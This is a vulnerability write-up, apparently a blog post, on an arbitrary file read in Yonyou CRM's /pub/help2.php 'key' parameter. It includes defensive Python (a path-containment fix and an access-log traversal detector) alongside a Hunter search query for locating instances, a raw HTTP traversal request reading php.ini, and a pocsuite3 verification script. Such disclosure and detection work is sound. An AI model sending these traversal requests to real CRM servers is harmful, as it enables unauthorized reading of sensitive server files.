Vulnerability reproduction: arbitrary file read in an interface of Yonyou (用友) CRM (detection script attached)

Disclaimer

The vulnerabilities discussed in this article have been fixed, and sensitive information has been redacted. The article is shared for experience only; do not take it as more than that. Unauthorized attacks are illegal! Sensitive information in the article has been processed at multiple levels. The user is responsible for any direct or indirect consequences and losses caused by disseminating or using the information provided here; the author bears no responsibility for them. Please take responsibility for your own actions.

Vulnerability description

Mouyou CRM is a comprehensive customer relationship management system designed to help companies build and maintain good relationships with their customers. It offers sales management, marketing, customer service, analytical reporting, and more. The system supports a variety of industries and enterprise sizes, is flexible and customizable, and can be tailored to the needs of each enterprise. The CRM software has an arbitrary file read vulnerability: the `key` parameter of the `/pub/help2.php` interface is used as a file path without being confined to the intended directory, so an attacker can read sensitive files from the server.
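The root cause described above is a user-supplied path that is joined onto a base directory without a containment check. The following is an added example (not code from the original article or from the CRM product) that shows the flawed pattern beside a hardened resolver in Python. The directory names, file names and file contents are constructed in a temporary sandbox so the block runs offline; the function names `read_help_unsafe`, `resolve_help_path` and `read_help_safe` are assumptions for illustration, not names from the product.

```python
import os
import tempfile
from pathlib import Path
from typing import Optional

# Constructed sandbox: a "help" directory holding one legitimate document,
# and a second directory outside it holding a file that must never be served.
BASE_DIR = Path(tempfile.mkdtemp(prefix="help_docs_")).resolve()
(BASE_DIR / "intro.html").write_text("<h1>Help</h1>")

OUTSIDE_DIR = Path(tempfile.mkdtemp(prefix="outside_")).resolve()
OUTSIDE_FILE = OUTSIDE_DIR / "secret.txt"
OUTSIDE_FILE.write_text("constructed secret")

# A key that walks out of BASE_DIR into OUTSIDE_DIR (e.g. "../outside_x/secret.txt").
ESCAPE_KEY = os.path.relpath(OUTSIDE_FILE, BASE_DIR)

# Only these document types are ever served from the help directory (defense in depth).
ALLOWED_SUFFIXES = {".html", ".txt"}


def read_help_unsafe(key: str) -> str:
    """Flawed pattern: the key is concatenated onto the base path as-is, so
    '..' segments escape the directory. Kept only to contrast with the fix."""
    with open(os.path.join(BASE_DIR, key.lstrip("/"))) as fh:
        return fh.read()


def resolve_help_path(key: str) -> Optional[Path]:
    """Hardened resolver: returns the resolved Path only if it is a regular
    file inside BASE_DIR with an allowed suffix; otherwise None."""
    if not key or "\x00" in key:
        return None
    # Strip leading separators so an absolute key cannot replace the base path,
    # then canonicalise to collapse '..' and symlinks before checking containment.
    candidate = (BASE_DIR / key.lstrip("/\\")).resolve()
    try:
        candidate.relative_to(BASE_DIR)
    except ValueError:
        return None  # resolved outside the help directory
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    if not candidate.is_file():
        return None
    return candidate


def read_help_safe(key: str) -> Optional[str]:
    """Serve a help document by key, or None when the key is rejected."""
    path = resolve_help_path(key)
    return path.read_text() if path is not None else None


if __name__ == "__main__":
    print("legit key  ->", read_help_safe("intro.html"))
    print("unsafe read->", read_help_unsafe(ESCAPE_KEY))
    print("safe read  ->", read_help_safe(ESCAPE_KEY))
```

The containment check is done on the resolved path rather than on the raw string, so encodings and `..` tricks that survive string filtering are still caught; the suffix allow-list limits what is served even if a symlink inside the directory points elsewhere.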

Hunter syntax

app.name="用友 CRM"

PoC and detection

GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=kq0qq7g3pfmkbou067ksc6uf85
Upgrade-Insecure-Requests: 1
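For defenders, the request above is easy to spot in web-server access logs: a hit on `/pub/help2.php` whose `key` parameter contains `..` segments or an absolute path. The following is an added example (not part of the original article) that scans combined-format access log lines for this pattern in Python. It percent-decodes the parameter twice so that single- and double-encoded traversal sequences are normalized before matching, and marks a flagged request with status 200 as a likely successful read. The log lines and IP addresses are constructed; the function names `analyze_line` and `scan_log` are assumptions for illustration.

```python
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Combined/common log format up to the status and size fields (referer and UA optional).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# A '..' segment delimited by a separator or the string boundary.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

VULNERABLE_PATH = "/pub/help2.php"


def normalize(value: str) -> str:
    """Decode percent-encoding twice (catches %252e-style double encoding)
    and fold backslashes to forward slashes."""
    return unquote(unquote(value)).replace("\\", "/")


def analyze_line(line: str) -> Optional[dict]:
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    parts = urlsplit(target)
    path = normalize(parts.path)
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []

    # Specific signature: the help2.php key parameter escaping its directory.
    if path.endswith(VULNERABLE_PATH) and "key" in params:
        for value in params["key"]:
            nv = normalize(value)
            if TRAVERSAL_RE.search(nv) or nv.startswith("/"):
                reasons.append("traversal in help2.php key")
                break

    # Generic signature: '..' in the request path itself.
    if TRAVERSAL_RE.search(path):
        reasons.append("traversal in request path")

    if not reasons:
        return None
    status = int(m.group("status"))
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "target": target,
        "status": status,
        "likely_success": status == 200,
        "reasons": reasons,
    }


def scan_log(lines: List[str]) -> List[dict]:
    """Scan a list of log lines and return all findings."""
    return [f for f in (analyze_line(l) for l in lines) if f is not None]


# Constructed sample log: three probes (plain, encoded, double-encoded) and two benign requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Dec/2023:10:00:01 +0800] "GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1" 200 61234 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Dec/2023:10:00:02 +0800] "GET /pub/help2.php?key=%2f%2e%2e%2f%2e%2e%2fapache%2fphp.ini HTTP/1.1" 200 61234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Dec/2023:10:00:03 +0800] "GET /pub/help2.php?key=intro.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Dec/2023:10:00:04 +0800] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Dec/2023:10:00:05 +0800] "GET /pub/help2.php?key=%252e%252e%2f%252e%252e%2fapache%2fphp.ini HTTP/1.1" 404 221 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Running the block on the constructed sample reports the three probes from 203.0.113.5 and nothing for the benign requests; the two 200 responses are marked as likely successful reads, which is the event worth escalating, while the 404 still records the attempt.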

PoC script

The script is written for the pocsuite3 framework.

# _*_ coding:utf-8 _*_
# @Time : 2023/12/18
# @Author: 炼金术师诸葛亮
from pocsuite3.api import POCBase, register_poc, requests


class yongyouu8_CRM_fileread(POCBase):
    pocDesc = '''用友CRM系统某接口存在任意文件读取'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-18'
    name = '用友CRM系统某接口存在任意文件读取'

    def _verify(self):
        result = {}
        # The key parameter of help2.php is used as a file path without a containment check
        url = self.url + '/pub/help2.php?key=/../../apache/php.ini'
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
        }

        try:
            response = requests.get(url, headers=headers, timeout=10)
            # A php.ini file begins with an "About php.ini" header comment
            if response.status_code == 200 and 'About php.ini' in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except Exception:
            pass

        # Always hand a result to the framework; an empty dict means "not vulnerable"
        return self.parse_output(result)


register_poc(yongyouu8_CRM_fileread)

Script exploit


Source: blog.csdn.net/jjjj1029056414/article/details/135064678